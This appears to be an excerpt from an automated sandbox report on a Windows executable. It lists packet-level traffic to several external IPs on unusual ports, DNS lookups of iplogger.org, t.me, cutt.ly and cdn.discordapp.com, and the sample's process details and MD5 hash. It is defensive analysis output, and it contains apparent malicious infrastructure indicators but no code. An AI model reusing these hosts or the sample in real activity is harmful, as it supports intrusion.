                                                                                                                                                                      Aug 23, 2022 18:27:52.443074942 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443098068 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443099022 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443128109 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443134069 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443140030 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443159103 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443177938 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443190098 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443208933 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443219900 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443249941 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443269014 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443279982 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443299055 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443305969 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443334103 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443419933 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443490982 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443521023 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443552017 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443557024 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443579912 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443582058 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443614960 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443644047 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443659067 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443687916 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443705082 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443736076 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443758965 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443766117 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443783045 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443798065 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443828106 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443835020 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443850040 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443860054 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443866968 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443893909 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443922997 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443924904 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443943024 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.443953037 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.443967104 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.444001913 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.444300890 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.444331884 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.444359064 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.444363117 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.444371939 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.444401026 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.444416046 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.444431067 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.444446087 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.444461107 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.444473028 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.444492102 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.444503069 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.444521904 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.444534063 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.444555044 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.444562912 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.444585085 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.444597006 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.444614887 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.444628954 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.444644928 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.444658041 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.444677114 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.444685936 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.444708109 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.444724083 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.444739103 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.444763899 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.444767952 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.444787025 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.444797039 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.444813967 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.444849014 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:53.078610897 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:53.716304064 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:58.374645948 CEST4993434589192.168.2.6103.89.90.61
                                                                                                                                                                      Aug 23, 2022 18:27:58.669935942 CEST3458949934103.89.90.61192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:58.793601990 CEST4993434589192.168.2.6103.89.90.61
                                                                                                                                                                      Aug 23, 2022 18:28:14.780221939 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:28:14.780350924 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:28:14.818476915 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:14.818500996 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:14.818553925 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:14.818563938 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:14.818629026 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:14.818737030 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:28:14.856512070 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:14.856550932 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:14.856569052 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:14.856585979 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:14.856601954 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:14.856618881 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:14.856692076 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:14.939999104 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:14.940073013 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:28:17.149996042 CEST4997816525192.168.2.6195.54.170.157
                                                                                                                                                                      Aug 23, 2022 18:28:17.217797995 CEST1652549978195.54.170.157192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:17.217916965 CEST4997816525192.168.2.6195.54.170.157
                                                                                                                                                                      Aug 23, 2022 18:28:18.994637012 CEST4993434589192.168.2.6103.89.90.61
                                                                                                                                                                      Aug 23, 2022 18:28:19.291210890 CEST3458949934103.89.90.61192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:19.291848898 CEST3458949934103.89.90.61192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:19.291923046 CEST4993434589192.168.2.6103.89.90.61
                                                                                                                                                                      Aug 23, 2022 18:28:19.292509079 CEST3458949934103.89.90.61192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:19.389662027 CEST4993434589192.168.2.6103.89.90.61
                                                                                                                                                                      Aug 23, 2022 18:28:22.231730938 CEST4997816525192.168.2.6195.54.170.157
                                                                                                                                                                      Aug 23, 2022 18:28:22.319756031 CEST1652549978195.54.170.157192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:22.460138083 CEST4997816525192.168.2.6195.54.170.157
                                                                                                                                                                      Aug 23, 2022 18:28:28.262286901 CEST49877443192.168.2.6216.58.209.35
                                                                                                                                                                      Aug 23, 2022 18:28:28.262315035 CEST44349877216.58.209.35192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:28.275208950 CEST499919582192.168.2.6176.113.115.146
                                                                                                                                                                      Aug 23, 2022 18:28:28.335170031 CEST958249991176.113.115.146192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:28.335298061 CEST499919582192.168.2.6176.113.115.146
                                                                                                                                                                      Aug 23, 2022 18:28:31.462002039 CEST499919582192.168.2.6176.113.115.146
                                                                                                                                                                      Aug 23, 2022 18:28:31.523087025 CEST958249991176.113.115.146192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:31.763367891 CEST499919582192.168.2.6176.113.115.146
                                                                                                                                                                      Aug 23, 2022 18:28:31.810067892 CEST958249991176.113.115.146192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:31.810224056 CEST499919582192.168.2.6176.113.115.146
                                                                                                                                                                      Aug 23, 2022 18:28:33.327193975 CEST4997816525192.168.2.6195.54.170.157
                                                                                                                                                                      Aug 23, 2022 18:28:33.391175032 CEST1652549978195.54.170.157192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:33.550259113 CEST4997816525192.168.2.6195.54.170.157
                                                                                                                                                                      Aug 23, 2022 18:28:44.909152031 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:28:47.173669100 CEST499919582192.168.2.6176.113.115.146
                                                                                                                                                                      Aug 23, 2022 18:28:47.235009909 CEST958249991176.113.115.146192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:47.361164093 CEST499919582192.168.2.6176.113.115.146
                                                                                                                                                                      Aug 23, 2022 18:28:49.637259007 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:49.699067116 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:49.699188948 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:49.712655067 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:49.774486065 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:49.904767036 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:49.904922962 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:49.917752981 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:49.979499102 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:49.979824066 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:49.979868889 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:49.979913950 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:49.979943991 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:49.979953051 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:49.979979992 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:49.979993105 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:49.979995012 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:49.980000019 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:49.980037928 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:49.980058908 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:49.980077982 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:49.980099916 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:49.980120897 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:49.980142117 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:49.980161905 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:49.980187893 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:49.980204105 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:49.980217934 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:49.980263948 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:50.041932106 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:50.042071104 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:50.042108059 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:50.042149067 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:50.042190075 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:50.042196989 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:50.042236090 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:50.042243004 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:50.042269945 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:50.042279959 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:50.042323112 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:50.042325020 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:50.042335987 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:50.042368889 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:50.042386055 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:50.042414904 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:50.042443991 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:50.042459011 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:50.042476892 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:50.042504072 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:50.042515993 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:50.042548895 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:50.042557955 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:50.042593956 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:50.042608023 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:50.042637110 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:50.042649031 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:50.042680025 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:50.042689085 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      Aug 23, 2022 18:28:50.042726040 CEST805001362.204.41.126192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:28:50.042737961 CEST5001380192.168.2.662.204.41.126
                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                      Aug 23, 2022 18:25:58.558125019 CEST192.168.2.68.8.8.80xd4a1Standard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:25:58.559531927 CEST192.168.2.68.8.8.80x66aeStandard query (0)accounts.google.comA (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:25:58.561670065 CEST192.168.2.68.8.8.80x43a2Standard query (0)clients2.google.comA (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:26:02.469877958 CEST192.168.2.68.8.8.80x228eStandard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:26:02.732988119 CEST192.168.2.68.8.8.80x9816Standard query (0)dns.googleA (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:26:03.269618034 CEST192.168.2.68.8.8.80x7c05Standard query (0)www.google.comA (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:26:03.750164032 CEST192.168.2.68.8.8.80x1fffStandard query (0)dns.googleA (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:26:04.857264996 CEST192.168.2.68.8.8.80x20b8Standard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:26:16.739634991 CEST192.168.2.68.8.8.80xabadStandard query (0)t.meA (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:27:29.492680073 CEST192.168.2.68.8.8.80xc362Standard query (0)cutt.lyA (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:27:32.457573891 CEST192.168.2.68.8.8.80x443aStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:27:51.019500971 CEST192.168.2.68.8.8.80xd7c8Standard query (0)t.meA (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:28:02.287678003 CEST192.168.2.68.8.8.80x7bfbStandard query (0)dns.googleA (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:28:11.983638048 CEST192.168.2.68.8.8.80xa530Standard query (0)dns.googleA (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:29:53.215486050 CEST192.168.2.68.8.8.80xffc6Standard query (0)dns.googleA (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:30:04.543730021 CEST192.168.2.68.8.8.80xe78bStandard query (0)dns.googleA (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:30:05.060198069 CEST192.168.2.68.8.8.80xe754Standard query (0)cutt.lyA (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:30:05.271364927 CEST192.168.2.68.8.8.80xe3f7Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                      Aug 23, 2022 18:25:58.577403069 CEST8.8.8.8192.168.2.60xd4a1No error (0)iplogger.org148.251.234.83A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:25:58.586961031 CEST8.8.8.8192.168.2.60x66aeNo error (0)accounts.google.com142.250.180.141A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:25:58.588440895 CEST8.8.8.8192.168.2.60x43a2No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:25:58.588440895 CEST8.8.8.8192.168.2.60x43a2No error (0)clients.l.google.com216.58.209.46A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:26:02.488293886 CEST8.8.8.8192.168.2.60x228eNo error (0)iplogger.org148.251.234.83A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:26:02.749851942 CEST8.8.8.8192.168.2.60x9816No error (0)dns.google8.8.4.4A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:26:02.749851942 CEST8.8.8.8192.168.2.60x9816No error (0)dns.google8.8.8.8A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:26:03.288584948 CEST8.8.8.8192.168.2.60x7c05No error (0)www.google.com142.251.209.4A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:26:03.768687963 CEST8.8.8.8192.168.2.60x1fffNo error (0)dns.google8.8.4.4A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:26:03.768687963 CEST8.8.8.8192.168.2.60x1fffNo error (0)dns.google8.8.8.8A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:26:04.874448061 CEST8.8.8.8192.168.2.60x20b8No error (0)iplogger.org148.251.234.83A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:26:16.756422997 CEST8.8.8.8192.168.2.60xabadNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:27:29.513514996 CEST8.8.8.8192.168.2.60xc362No error (0)cutt.ly172.67.8.238A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:27:29.513514996 CEST8.8.8.8192.168.2.60xc362No error (0)cutt.ly104.22.1.232A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:27:29.513514996 CEST8.8.8.8192.168.2.60xc362No error (0)cutt.ly104.22.0.232A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:27:32.477933884 CEST8.8.8.8192.168.2.60x443aNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:27:32.477933884 CEST8.8.8.8192.168.2.60x443aNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:27:32.477933884 CEST8.8.8.8192.168.2.60x443aNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:27:32.477933884 CEST8.8.8.8192.168.2.60x443aNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:27:32.477933884 CEST8.8.8.8192.168.2.60x443aNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:27:51.038007021 CEST8.8.8.8192.168.2.60xd7c8No error (0)t.me149.154.167.99A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:28:02.306051970 CEST8.8.8.8192.168.2.60x7bfbNo error (0)dns.google8.8.4.4A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:28:02.306051970 CEST8.8.8.8192.168.2.60x7bfbNo error (0)dns.google8.8.8.8A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:28:12.000484943 CEST8.8.8.8192.168.2.60xa530No error (0)dns.google8.8.8.8A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:28:12.000484943 CEST8.8.8.8192.168.2.60xa530No error (0)dns.google8.8.4.4A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:29:53.234251022 CEST8.8.8.8192.168.2.60xffc6No error (0)dns.google8.8.4.4A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:29:53.234251022 CEST8.8.8.8192.168.2.60xffc6No error (0)dns.google8.8.8.8A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:30:04.562153101 CEST8.8.8.8192.168.2.60xe78bNo error (0)dns.google8.8.4.4A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:30:04.562153101 CEST8.8.8.8192.168.2.60xe78bNo error (0)dns.google8.8.8.8A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:30:05.079511881 CEST8.8.8.8192.168.2.60xe754No error (0)cutt.ly172.67.8.238A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:30:05.079511881 CEST8.8.8.8192.168.2.60xe754No error (0)cutt.ly104.22.1.232A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:30:05.079511881 CEST8.8.8.8192.168.2.60xe754No error (0)cutt.ly104.22.0.232A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:30:05.292202950 CEST8.8.8.8192.168.2.60xe3f7No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:30:05.292202950 CEST8.8.8.8192.168.2.60xe3f7No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:30:05.292202950 CEST8.8.8.8192.168.2.60xe3f7No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:30:05.292202950 CEST8.8.8.8192.168.2.60xe3f7No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                      Aug 23, 2022 18:30:05.292202950 CEST8.8.8.8192.168.2.60xe3f7No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                      • 45.95.11.158
                                                                                                                                                                      • 77.91.103.222
                                                                                                                                                                      • 88.198.122.116
                                                                                                                                                                      • 62.204.41.126

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:18:25:45
                                                                                                                                                                      Start date:23/08/2022
                                                                                                                                                                      Path:C:\Users\user\Desktop\q1wLT3xKiY.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\q1wLT3xKiY.exe"
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:2701003 bytes
                                                                                                                                                                      MD5 hash:45597A36ACE0C0DF1890299D8D82D938
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
